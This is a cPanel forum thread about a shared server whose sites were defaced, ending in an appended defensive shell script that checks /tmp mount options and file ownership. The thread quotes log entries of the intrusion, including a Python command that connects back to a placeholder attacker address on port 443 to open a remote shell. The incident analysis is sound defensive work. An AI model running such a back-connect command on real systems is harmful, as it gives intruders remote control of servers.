The Community Forums


Websites Hacked

Discussion in 'Security' started by abdelhost77, May 25, 2013.

  1. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator
    someone injected:
    -rw-r--r-- 1 root root index.htm

    in the public_html of all the accounts on the server, even though I have:

    Last Cpanel release
    Kernel patched
    /tmp secured
    suphp
    patch avoid Symlink
    Firewall CSF&LFD
    Mod security


    anyone have an idea how this can be done with all the security stuff above?
    It is critical please

    thanks a lot
     
  2. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator
    I think it was a python or perl script,

    can we deactivate Python or perl scripts from being used by apache?

    for example to remove :
    AddHandler cgi-script .cgi .pl .plx .ppl .perl

    From httpd.conf ?
     
  3. simonas

    simonas Well-Known Member

    Joined:
    Apr 21, 2013
    Messages:
    141
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Lithuania
    cPanel Access Level:
    Root Administrator
    Disable cgi in the package.
     
  4. nospa

    nospa Well-Known Member

    Joined:
    Apr 23, 2012
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Reseller Owner
    How did you find that this was a perl script executed via apache? Permissions are root:root so it might be a root compromise.
     
  5. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator
    Thanks for your feedback

    no, I am sure it was not a root compromise because the attacker was only able to inject an index.htm file

    I think he used some PHP functions such as "chown", "chmod" to change file ownership, and the "fsockopen" PHP function to inject the file.

    I did add those functions to disable_php

    In logs we found :

    CSF Logs :
    python /tmp/bc0


    SUEXEC Logs :
    cmd: python.izo
    cmd: shell.izo



    But /tmp is secured so there are no execution rights.

    I'm still not 100% sure how he does that.
     
    #5 abdelhost77, May 25, 2013
    Last edited: May 25, 2013
  6. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    998
    Likes Received:
    10
    Trophy Points:
    18
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    Only root can create root-owned files, or change the owner to root.

    Your box is rooted. It's practically impossible to clean it without reloading the OS.
     
  7. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator
    thanks quietFinn

    But I don't think so, the root password has not been changed by the attacker

    and also, the PHP hack scripts were launched from one cPanel account that was using Joomla; that account was hacked and then some PHP hack scripts were put in it.

    but once I suspended that cPanel account, the attacker was unable to do the same.

    actually I added some suspicious PHP functions to disable_functions in php.ini

    hope this fixes the issue.
     
  8. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,724
    Likes Received:
    660
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    Hello :)

    I have to agree that at the very least, this type of activity warrants an investigation by a qualified system administrator to determine if the server has been rooted. It's a good idea to consult with a qualified system administrator or security specialist if your system has been exploited and you have little experience with security. Some companies list their services for this in the cPanel application catalog:

    cPanel Application Catalog - System Administration Services

    Thank you.
     
  9. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    If disabling one Joomla account stopped the activity perhaps it wasn't a root compromise.

    However, as far as I know the chown() call only works for root, so that doesn't sound good. You're confused about the root password; it's not required to exploit a system. Sure, sometimes the exploiters change the root password, but as that tends to make it very obvious that they have access, they nearly always leave it alone.

    Likely as a newbie admin you won't be able to solve this one on your own, you probably want to seek some skilled help.
     
  10. cPanelJared

    cPanelJared Technical Analyst
    Staff Member

    Joined:
    Feb 25, 2010
    Messages:
    1,842
    Likes Received:
    18
    Trophy Points:
    38
    Location:
    Houston, TX
    cPanel Access Level:
    Root Administrator
    When an attacker compromises a server, the attacker usually wants to avoid drawing the attention of the legitimate owner of the server, because the legitimate owner at that point would probably reinstall the operating system and harden it, making the attacker's work for naught. An attacker changing the root password would be a sure way to catch the attention of the legitimate owner. Because of that, the fact that the root password has not changed does not mean that the server is not root compromised.

    You need to get a qualified security expert to look at your server, and you need to seriously consider making sure you have good backups of your data, reformatting the hard drive and reinstalling the operating system and cPanel, and restoring your backed-up data.
     
  11. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator



    We have many servers, and the one that was hacked was freshly installed, so I think we forgot to secure /tmp, and "anonymous FTP" was also activated, so I think one of these two things, or both, have been used to compromise the server, like a perl script executed from /tmp which is using anonymous FTP access to inject an index.htm file in all public_html accounts. But I'm sure it is not a root compromise.

    In fact, if I take a root:root file from server1 and send it by Anonymous FTP to server2, will the owner of the file on server2 be root:root?
     
    #11 abdelhost77, Jun 26, 2013
    Last edited: Jun 26, 2013
  12. cPanelJared

    cPanelJared Technical Analyst
    Staff Member

    Joined:
    Feb 25, 2010
    Messages:
    1,842
    Likes Received:
    18
    Trophy Points:
    38
    Location:
    Houston, TX
    cPanel Access Level:
    Root Administrator
    Rooting a server does not require a highly skilled hacker. There is a reason for the word "rootkit" - it is a kit that does not require skills.

    It is your server, so you are free to do whatever you want, but the fact that the root password was not changed does not mean the server was not rooted. Typically, once a perpetrator roots a server, he wants to keep control of it as long as possible, and changing the root password would definitely get the server administrator's attention, so usually the root password is not changed.

    You can either reformat and reinstall and know that the server is not compromised, or you can pick and choose evidence that supports the idea that it is not compromised. You have been given a lot of good advice in this thread, but what you do with it is entirely your responsibility.
     
  13. cPanelJared

    cPanelJared Technical Analyst
    Staff Member

    Joined:
    Feb 25, 2010
    Messages:
    1,842
    Likes Received:
    18
    Trophy Points:
    38
    Location:
    Houston, TX
    cPanel Access Level:
    Root Administrator
    No. The owner of the file will be the anonymous FTP user. This is not proof that your server is not rooted.
     
  14. Serra

    Serra Well-Known Member

    Joined:
    Oct 27, 2005
    Messages:
    213
    Likes Received:
    4
    Trophy Points:
    18
    Location:
    Florida
    To say that the box was not accessed because the account was disabled doesn't prove the hacker no longer has access. Absence of proof is not itself proof. The hacker might just be slow to update their script or hasn't got back to attacking the box again.
     
  15. stdout

    stdout Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    189
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Nelspruit, Mpumalanga, South Africa
    cPanel Access Level:
    Root Administrator
    Nicely put.
     
  16. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    I know that for a non-native English speaker the meaning of the word "perhaps" might not be clear; it actually means fairly much the opposite of "proves". Also worth reading the rest of the message in which I say he should get skilled help. :) The sentence was discussing whether the box had a root-level compromise or not, which is quite different from whether a hacker might come back or not. The fact that the exploit stopped once the account was disabled is suggestive of it not being a root hack. Regardless, more forensic examination of the box is required; if file ownership was changed then it sounds like the box was hacked.

    (And yes, what you say is of course entirely true, once rooted always rooted; if in fact he has been rooted)
     
  17. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator
    In fact I think the reason is that /tmp was not secured enough, because we found in the CSF logs:

    Executable:

    /usr/bin/python

    Command Line (often faked in exploits):

    python /tmp/bc0 <hacker-ip-address> 443

    it seems to be some Python rootkit script.
     
  18. 24x7server

    24x7server Well-Known Member

    Joined:
    Apr 17, 2013
    Messages:
    1,146
    Likes Received:
    34
    Trophy Points:
    48
    Location:
    India
    cPanel Access Level:
    Root Administrator
    Hello,

    You will have to mount your /tmp with nosuid,noexec,nodev options
     
  19. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator

    Yes sure, actually it is
    /tmp on /var/tmp type none (rw,noexec,nosuid,bind)

    But I was talking about the reason for how the server got compromised.
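Two checks that follow from this thread, written as an added example (it is not code from any poster or from cPanel's own tooling). The first reports which of the noexec, nosuid and nodev options 24x7server listed are absent from a mount entry; the /tmp line quoted just above lacks nodev, which is the case the sample reproduces. The second lists files under an account's public_html that the account does not own, which is how a root-owned index.htm like the one in the opening post would stand out (only root can create such a file, as quietFinn noted). The mount table and the home directory are constructed sample data so the script runs offline and without root; MOUNTS_SOURCE, tmp_missing_opts, foreign_owned_files, make_sample_home and check_account are names chosen for this example, not anything from the thread.

```shell
#!/bin/sh
# Added example, not code from the thread or from cPanel.
# Two defender-side checks: are /tmp-style mounts hardened, and does every
# file under an account's public_html belong to that account?

# Constructed sample of /proc/mounts. The /tmp entry mirrors the line quoted
# in the thread (rw,noexec,nosuid,bind), so nodev is deliberately absent.
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime 0 0
/var/tmp /tmp none rw,noexec,nosuid,bind 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0'

# tmp_missing_opts MOUNTPOINT
# Prints the hardening options (noexec nosuid nodev) absent from the entry
# for MOUNTPOINT and returns 0 only when none are missing. The mount table
# comes from $MOUNTS_SOURCE when set, otherwise from the sample above.
tmp_missing_opts() {
    mp="$1"
    opts=$(printf '%s\n' "${MOUNTS_SOURCE:-$SAMPLE_MOUNTS}" \
        | awk -v mp="$mp" '$2 == mp { print $4; exit }')
    if [ -z "$opts" ]; then
        echo "not-mounted"
        return 1
    fi
    missing=""
    for opt in noexec nosuid nodev; do
        case ",$opts," in
            *",$opt,"*) ;;                    # option present
            *) missing="$missing $opt" ;;     # option absent
        esac
    done
    echo "${missing# }"
    [ -z "$missing" ]
}

# foreign_owned_files HOMEDIR ACCOUNT
# Lists regular files below HOMEDIR/public_html whose owner is not ACCOUNT.
# On a shared host everything there should belong to the account, so a
# root:root index.htm shows up here. Prints nothing when all is in order.
foreign_owned_files() {
    docroot="$1/public_html"
    account="$2"
    [ -d "$docroot" ] || return 0
    find "$docroot" -type f -exec stat -c '%U %n' {} + \
        | awk -v u="$account" '$1 != u { sub(/^[^ ]+ /, ""); print }'
}

# make_sample_home
# Builds a throwaway home directory with two files (constructed data) and
# prints its path, so foreign_owned_files can be exercised without root.
make_sample_home() {
    base=$(mktemp -d)
    mkdir -p "$base/public_html/blog"
    printf '<html>defaced</html>\n' > "$base/public_html/index.htm"
    printf '<?php echo "ok"; ?>\n' > "$base/public_html/blog/index.php"
    echo "$base"
}

# check_account HOMEDIR ACCOUNT
# Runs both checks and prints one line per finding.
check_account() {
    m=$(tmp_missing_opts /tmp) || echo "/tmp missing options: $m"
    foreign_owned_files "$1" "$2" | while IFS= read -r f; do
        echo "not owned by $2: $f"
    done
}

# Demonstration against the constructed data. For a real server export
# MOUNTS_SOURCE="$(cat /proc/mounts)" and call check_account /home/USER USER.
sample=$(make_sample_home)
check_account "$sample" "$(id -un)"   # nothing foreign; /tmp is missing nodev
check_account "$sample" nobody        # both sample files are reported
rm -rf "$sample"
```

The ownership check deliberately compares against the expected account name rather than searching for root-owned files only: an attacker who can create files as any user other than the account (nobody, the web server user, an anonymous FTP user as cPanelJared describes) is caught the same way, and the output gives the investigator a concrete file list rather than a yes/no answer.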
     